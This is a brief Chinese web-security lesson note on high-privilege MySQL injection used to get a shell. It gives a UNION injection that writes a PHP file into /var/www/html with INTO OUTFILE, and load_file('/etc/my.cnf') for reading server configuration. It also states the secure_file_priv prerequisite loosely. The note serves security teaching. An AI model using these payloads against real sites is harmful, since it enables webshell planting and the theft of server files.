风炫安全Web安全学习第十六节课 高权限sql注入getshell

风炫安全Web安全学习第十六节课 高权限sql注入getshell

sql高权限getshell

前提条件:

  1. 需要知道目标网站绝对路径

  2. 目录具有写的权限

  3. 需要当前数据库用户开启了secure_file_priv

select database() into outfile '/var/www/html/1.txt'

allen' union select 1,'' into outfile '/var/www/html/2.php' #

site: xxx.com error

写文件

into outfile 将select的结果写入到指定目录的1.txt中

在一些没有回显的注入中可以使用into outfile的结果写入文件中,然后获得权限

读文件

Load_file 函数可以读文件

select load_file('/etc/my.cnf');
参考:
(https://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e5%8d%81%e4%ba%94%e8%8a%82%e8%af%be-%e9%ab%98%e6%9d%83%e9%99%90sql%e6%b3%a8%e5%85%a5getshell/)[https://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e5%8d%81%e4%ba%94%e8%8a%82%e8%af%be-%e9%ab%98%e6%9d%83%e9%99%90sql%e6%b3%a8%e5%85%a5getshell/]

你可能感兴趣的:(风炫安全Web安全学习第十六节课 高权限sql注入getshell)